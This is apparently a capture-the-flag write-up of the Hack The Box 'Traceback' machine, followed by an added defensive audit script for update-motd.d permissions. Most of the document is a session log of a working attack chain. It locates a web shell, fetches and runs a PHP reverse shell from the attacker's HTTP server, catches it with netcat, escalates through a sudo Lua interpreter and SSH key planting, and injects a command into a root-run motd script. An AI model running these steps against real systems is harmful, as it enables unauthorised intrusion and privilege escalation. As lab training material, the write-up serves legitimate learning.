Starting with the Traceback machine. The flag is dynamic, so this writeup will be published once the machine is retired.
Search for and build a wordlist of the best-known web shells.
Run gobuster with that list.
We found: http://10.10.10.181/smevk.php
Make a reverse shell and serve it over HTTP:
┌─[parrotvm@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...
10.10.10.181 - - [31/Mar/2020 07:27:01] "GET /php-reverse-shell.php HTTP/1.1" 200 -
Fetch our shell with wget from the command prompt of the smevk.php web shell, then execute it:
┌─[✗]─[parrotvm@parrot]─[~/Downloads]
└──╼ $nc -lvp 4444
listening on [any] 4444 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.15.138] from (UNKNOWN) [10.10.10.181] 39530
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:29:55 up 1 min, 0 users, load average: 1.81, 0.70, 0.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ /bin/bash -i
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
webadmin@traceback:/$ cd home/webadmin
cd home/webadmin
webadmin@traceback:/home/webadmin$ ls -al
ls -al
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
webadmin@traceback:/home/webadmin$ echo "os.execute(\"/bin/sh\")" > privesc.lua
<admin$ echo "os.execute(\"/bin/sh\")" > privesc.lua
webadmin@traceback:/home/webadmin$ ls -al
ls -al
total 48
drwxr-x--- 5 webadmin sysadmin 4096 Mar 31 04:30 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
-rw-rw-rw- 1 webadmin webadmin 22 Mar 31 04:30 privesc.lua
webadmin@traceback:/home/webadmin$ chmod +x privesc.lua
webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
<$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
/bin/bash -i
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
sysadmin@traceback:/home/webadmin$ cd ../sysadmin
sysadmin@traceback:~$ ls -al
ls -al
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Mar 31 04:29 user.txt
sysadmin@traceback:~$ wget http://10.10.15.138:1337/id_rsa.pub
wget http://10.10.15.138:1337/id_rsa.pub
--2020-03-31 04:38:05-- http://10.10.15.138:1337/id_rsa.pub
Connecting to 10.10.15.138:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569 [application/octet-stream]
Saving to: 'id_rsa.pub'
0K 100% 140M=0s
2020-03-31 04:38:06 (140 MB/s) - 'id_rsa.pub' saved [569/569]
sysadmin@traceback:~$ ls -al
ls -al
total 4340
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 31 04:38 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rw-r--r-- 1 sysadmin sysadmin 569 Mar 31 04:33 id_rsa.pub
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Mar 31 04:29 user.txt
sysadmin@traceback:~$ cat id_rsa.pub > .ssh/authorized_keys
After looking around, I got some hints:
sysadmin@traceback:/$ locate 00-header
locate 00-header
/etc/update-motd.d/00-header
/var/backups/.update-motd.d/00-header
sysadmin@traceback:/$ ls -al /etc/update-motd.d/
ls -al /etc/update-motd.d/
total 32
drwxr-xr-x 2 root sysadmin 4096 Aug 27 2019 .
drwxr-xr-x 80 root root 4096 Mar 16 03:55 ..
-rwxrwxr-x 1 root sysadmin 981 Mar 31 03:17 00-header
-rwxrwxr-x 1 root sysadmin 982 Mar 31 03:17 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Mar 31 03:17 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Mar 31 03:17 80-esm
-rwxrwxr-x 1 root sysadmin 299 Mar 31 03:17 91-release-upgrade
sysadmin@traceback:/$ ls -al /var/backups/.update-motd.d/
ls -al /var/backups/.update-motd.d/
total 32
drwxr-xr-x 2 root root 4096 Mar 5 02:56 .
drwxr-xr-x 3 root root 4096 Aug 25 2019 ..
-rwxr-xr-x 1 root root 981 Aug 25 2019 00-header
-rwxr-xr-x 1 root root 982 Aug 27 2019 10-help-text
-rwxr-xr-x 1 root root 4264 Aug 25 2019 50-motd-news
-rwxr-xr-x 1 root root 604 Aug 25 2019 80-esm
-rwxr-xr-x 1 root root 299 Aug 25 2019 91-release-upgrade
sysadmin@traceback:/$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
sysadmin@traceback:/etc/update-motd.d$ echo "cat /root/root.txt" >> 00-header
Open a new terminal:
┌─[✗]─[parrotvm@parrot]─[~/.ssh]
└──╼ $ssh sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
a0936cc885fef443c1eea92246fc1452
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Mar 31 04:42:58 2020 from 10.10.15.138
$
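The root step works because the scripts in /etc/update-motd.d are group-writable by sysadmin while still run as root at login, and the box even keeps a pristine root-owned copy under /var/backups/.update-motd.d. The audit below is an added example, not part of the original writeup: it flags motd scripts that are not root-owned or are group/world-writable, and diffs each one against the backup copy to surface appended lines. It assumes GNU stat/cmp/diff (Linux); the two default paths are the ones seen in the session, and the fixture directories are constructed for the demo.

```shell
#!/bin/sh
# Audit an update-motd.d directory (added example, not the writeup's own code).
# Findings: non-root owner, group/world write bit, or content differing from
# the known-good backup copy. Defaults are the two paths seen on the box.
audit_motd() {
    live="${1:-/etc/update-motd.d}"
    backup="${2:-/var/backups/.update-motd.d}"
    for f in "$live"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        owner=$(stat -c %U "$f")       # GNU stat: owner name
        mode=$(stat -c %a "$f")        # GNU stat: octal mode, e.g. 775
        [ "$owner" = root ] || echo "FINDING: $f owned by $owner, not root"
        # 022 (octal) = group-write | other-write; any such bit is a finding
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "FINDING: $f is group/world writable (mode $mode)"
        fi
        if [ -f "$backup/$name" ] && ! cmp -s "$f" "$backup/$name"; then
            echo "FINDING: $f differs from backup copy"
            diff "$backup/$name" "$f" | sed 's/^/    /'   # show what changed
        fi
    done
}

# Constructed fixture (hypothetical, for the demo): a live dir with one
# tampered, group-writable 00-header and a clean 10-help-text, plus a
# pristine backup dir mirroring the layout on the box.
setup_demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/live" "$tmp/backup"
    printf '#!/bin/sh\necho "Welcome"\n' > "$tmp/backup/00-header"
    cp "$tmp/backup/00-header" "$tmp/live/00-header"
    echo 'cat /root/root.txt' >> "$tmp/live/00-header"   # the appended line
    chmod 775 "$tmp/live/00-header"
    chmod 755 "$tmp/backup/00-header"
    printf '#!/bin/sh\n' > "$tmp/live/10-help-text"
    chmod 755 "$tmp/live/10-help-text"
    cp "$tmp/live/10-help-text" "$tmp/backup/10-help-text"
    echo "$tmp"
}

demo=$(setup_demo)
audit_motd "$demo/live" "$demo/backup"
```

Run it without arguments on a real host to audit /etc/update-motd.d directly; the fix on the box is root ownership with mode 755 on every script in that directory.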